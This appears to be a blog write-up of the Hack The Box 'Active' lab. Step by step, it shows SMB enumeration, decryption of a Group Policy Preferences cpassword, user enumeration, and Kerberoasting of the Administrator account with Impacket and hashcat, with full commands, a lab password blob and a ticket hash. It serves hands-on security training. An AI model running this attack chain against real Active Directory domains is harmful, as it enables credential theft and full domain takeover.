Hi guys, what’s up. Welcome to my page. Today we are going to solve Active lab in HTB. The Active machine on Hack The Box focuses on Active Directory enumeration and privilege escalation. It introduces common techniques such as SMB enumeration, Kerberoasting, and exploiting misconfigured domain accounts. Solving this machine requires a solid understanding of Windows authentication and domain services. It is considered an excellent lab for practicing real-world Active Directory attack paths. Overall, Active is a great beginner-friendly machine for learning fundamental Windows penetration testing techniques.
Enumeration
nmap -sV -sC 10.129.31.130
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-06 05:57 -0400
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.129.31.130
Host is up (0.25s latency).
Not shown: 981 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-06 10:01:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-07-06T10:02:46
53,88,135,389,445 ports are open.
SMB enumeration
We can use msfconsole auxiliary module for enumerating shares.
msfconsole -q
msf > search name:smb type:auxiliary
msf auxiliary(scanner/smb/smb_enumshares) > run
[-] 10.129.31.130:139 - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.129.31.130:445 - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 10.129.31.130:445 - peer_native_lm is only available with SMB1 (current version: SMB2)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.29/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[+] 10.129.31.130:445 - ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] 10.129.31.130:445 - C$ - (DISK|SPECIAL) Default share
[+] 10.129.31.130:445 - IPC$ - (IPC|SPECIAL) Remote IPC
[+] 10.129.31.130:445 - NETLOGON - (DISK) Logon server share
[+] 10.129.31.130:445 - Replication - (DISK)
[+] 10.129.31.130:445 - SYSVOL - (DISK) Logon server share
[+] 10.129.31.130:445 - Users - (DISK)
[*] 10.129.31.130: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7 shares we have. After check we have anonymous read permission on Replication shares.
Inside the replication shares we should inspect the contents to determine whether there are any potentially sensitive or interesting files present.
smbclient //10.129.31.130/Replication -U “”%””
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get groups.xml -
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb
There are groups.xml files which is stored credentials inside.
Cracking the hash
Gpp-decrypt can solve
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
User Flag
We found SVC_TGS ‘s password. So lets get in.
smbclient //10.129.31.130/Users -U SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Mon Jul 6 05:57:18 2026
5217023 blocks of size 4096. 275658 blocks available
smb: \SVC_TGS\Desktop\> get user.txt -
*********
Kerberosting
./kerbrute userenum -d active.htb --dc 10.129.31.130 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/06/26 - Ronnie Flathers @ropnop
2026/07/06 06:12:38 > Using KDC(s):
2026/07/06 06:12:38 > 10.129.31.130:88
2026/07/06 06:13:29 > [+] VALID USERNAME: administrator@active.htb
Nothing.
Privilege Escalation
GetUserSPNs.py is an Impacket tool used to enumerate Service Principal Names (SPNs) in an Active Directory domain. With the -request option, it requests Kerberos service tickets (TGS) for service accounts, enabling Kerberoasting attacks by extracting ticket hashes for offline password cracking.
GetUserSPNs.py -request -dc-ip 10.129.31.130 active.htb/SVC_TGS -save -outputfile active.out
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetUserSPNs.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-07-06 05:57:22.849416
*Hash
*
hashcat -m 18200 GetUserSPNs.out /usr/share/wordlists/rockyou.txt — force
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5158803791e7e090b15c7b17a883f1cf$2ca8851927cb8c16c1a1e444ccc89dd7f059644e2a22ac5a70ff32bb905167c58084d960659d37df47db978aa7e71f5604bd8d61cb2db35cb40e65d485ff63068270bee0cbd088d34d5f195b4c0b069fce0507a4212604ef64b372a5b05bdffd00a7b8725a781d4cb1eea039930e7fd3a4ec49369c55ac951f02af6940d8b060b1785252182a1c5e9b69b96883a25d1a9edd6552798bc115dd6412cde5507571cf2cc5833fba4671660a9048613c5b5ea0aa5455b1f2ab40f1bfde3b3fa6022a2c18e1a9e2f4d187d06656016c681ac91642402d3daa9e98e81775395318c05e1b63b97e31c3e5a82a9f7540a4e8284f171b319ceeef5281d6a5aaa70e703aad93ca2d1dd5ef6e2986769c3732259e81a5d09cd27c7db57d424c2c2061091122478bc27bc691cf1cbc1c091de37beacfbd5670eb5df2d3ca6a3fd21d43421e803e857caaf231aefceac6b144356c50f159d31cacc7b4a6367801baac3b65a795716507e9ca79176823c45a9517e17f261c21e59825eea4431ab3fc42953b3773e41d2686015aefd1a16708910ab70193e08b617d7b003bf63e575e431b20d4742e781532adf1e4b24549019007727ca6d5681df580ae33f2ae1c0d628968243fe1a52fc10e5b3fbc7e378bd3b5f4950a6ab973053baba84930312c76c083acf3bc4bb0cd31f082b2032fe255bc402c35408de18eb77857f27f882fc17f3d4b447f354f0e75e262764724de5881fb902ddce6c88c974bad0e423290bed826d567a0289521a5477b7b6a5349c87261b84de3e607ec7a4e3a6b429020125a514a18853efaa80b2e0149b098025c1a8dae792a2ada5e55d353c7f264e923b3fa8b8d1ca5e255f6cc8a6c8df9a1011900f7a2cf1584db8fe9ef2d9b6b35fae10a5e30d162db9b425408efcf6ce696ed0137fa43098ac1193a11bfbef6597062fe4dbc388ec9a10cd7eef44fd433a0ba6c7adefb0ab8dc360868ea09557c1681efd75ab3173265a4ef735a667f1f5fc8661a8458a2120028769bbfb40a61d0d10ad3e8670de04e807010d6c54110cc91d6261302974fdec509ffa5ae61078fd8dad91ed70c630687d8bd2b14f7f5a1d28e019f6bc4dd59138d6683f454fae9901481f1bfd6577c74ddba2dfdbd9658088ee12b5a0c3c03b8bfc37fad05aa289f7b410f086c353a48d604c1a5ad0d1ae9e9461dfbd19127eb5ee661b4eeeda9ab440d16a806782b5321057fcea6ac2cf77fe3967f7c0209772be2b80e2a:*******
Root Flag
We got administrator’s password.
smbclient //10.129.31.130/Users -U Administrator
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt AR 34 Mon Jul 6 05:57:18 2026
5217023 blocks of size 4096. 279206 blocks available
smb: \Administrator\Desktop\> get root.txt -
Stay safe. Goodbye
Top comments (0)